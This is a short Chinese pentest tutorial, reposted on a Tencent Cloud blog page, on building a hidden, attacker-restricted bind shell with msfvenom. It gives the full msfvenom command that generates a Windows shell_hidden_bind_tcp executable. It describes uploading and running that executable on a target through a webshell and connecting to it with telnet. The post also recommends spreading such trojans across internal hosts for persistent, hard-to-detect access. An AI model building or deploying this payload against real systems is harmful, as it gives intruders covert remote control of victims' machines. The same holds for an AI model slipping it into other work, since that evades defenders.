专栏首页区块链安全技术Msfvenom制作专属Shell

Msfvenom制作专属Shell

文章前言

有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀,本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell

实验环境

攻击主机:192.168.174.129

目标主机:192.168.174.170

其他主机:192.168.174.173

操作流程

Step 1:实验MSF生成隐藏Bind Shell

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.174.129 -f exe > hidden_shell.exe

Step 2:之后将hidden_shell.exe通过一句话木马或者其他方式上传/下载到目标主机上并执行

Step 3:之后查看目标主机本地的8889端口是否开放

Step 4:之后使用同网段的其他主机链接该目标主机

telnet 192.168.174.170 8889

Step 5:使用攻击主机去链接

telnet 192.168.174.170 8889

文末思考

通过制作类似的专属Shell还有一个好处就是当你在内网渗透测试过程中拿下一台跳板机时,你可以利用这台跳板机生成一个正向木马并将其丢到内网的其他机器里面,之后随时可以通过Telnet获取到目标的shell

本文分享自微信公众号 - 七芒星实验室(HeptagramSec),作者:Al1ex

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-07-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 反弹shell的学习总结 - Part 2

    dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。d...

    贝塔安全实验室
  • 远控免杀专题文章(2)-msfvenom隐藏的参数

    因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些小技巧。

    Ms08067安全实验室
  • Metasploit学习笔记

    Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,...

    HACK学习
  • msf之木马程序

    这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134

    宸寰客
  • msf在后渗透中的利用

    在最近的一次CTF比赛中,有内网渗透相关的题目,当时只能反弹一个最基本的bash,没办法上传代理工具把内网端口转发出来,由于时间紧没有细想,草草拿了主机的fla...

    WgpSec
  • 无文件落地攻击

    所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行...

    Al1ex
  • 安全研究 | 多种方式利用HTTP PUT方法漏洞

    今天分享的文章是对HTTP PUT方法开启漏洞的多种应用讲析,在实战场景中,首先我们要确定目标网站是否启用了HTTP PUT方法,如果启用的话,我们就可以结合多...

    FB客服
  • 认识Metasploit框架

    ​ Metaspliot(MSF)渗透测试框架,提供众多的接口、选项、变量、模块以供渗透工作人员使用它完成一系列的渗透攻击。

    Mirror王宇阳
  • Kali Linux Web渗透测试手册(第二版) - 7.3 - 利用metasploit创建并反弹shell

    thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt

    用户1631416
  • 从 “ 短信劫持马 ” 来谈APP安全

    这种短信劫持木马的概念和新闻我想大家都应该接触过了,就不怎么说概念了,具体的可以搜一搜新闻,一抓一大把。

    网e渗透安全部
  • Kali Linux Web渗透测试手册(第二版) - 7.3 - 利用metasploit创建并反弹shell

    thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt,

    7089bAt@PowerLi
  • Metasploitable 2系列教程:漏洞利用之Unreal IRCd 3.2.8.1

    这篇文章中,将会介绍如何利用 Metasploitable 2 上 Unreal IRCd service 存在的漏洞;学习如何对网络服务进行枚举,及如何定义和...

    FB客服
  • 红队测试之Windows提权小结

    本节主要针对Windows操作系统下的权限提升进行介绍,提权是后渗透重要的一环节,在权限较低的情况下,站在攻击者的视角进行内部网络安全测试、系统安全测试、应用安...

    FB客服
  • 当Strust2遇到防火墙,你的思路够骚吗?

    PS:本次测试仅仅做为学习,漏洞已经提交给管理员,请勿用于非法用途,所产生的一切后果与作者无关。文章如果有问题,欢迎大家及时指正!

    FB客服
  • 记一次渗透测试利用Portainer进行docker逃逸获得宿主机Ubuntu权限。

    https://github.com/tangxiaofeng7/Shiroexploit

    天钧
  • 记一次逃逸Docker的渗透测试

    https://github.com/tangxiaofeng7/Shiroexploit

    HACK学习
  • msf工具之木马程序制作以及伪装

    将木马程序点击执行,监听端口得到回应,成功控制电脑 输入shell,彻底控制电脑

    行云博客
  • 用不同姿势复现 CVE-2018-8174 漏洞

    日前,360 核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用 0day 漏洞的 APT 攻击,捕获到了全球首例利用浏览器 0day 漏洞的新型 ...

    信安之路
  • 干货 | Shellcode免杀总结<二>

    xor异或加密shellcode后,申请内存执行,和文开头执行shell从的方式无区别

    HACK学习

扫码关注云+社区

领取腾讯云代金券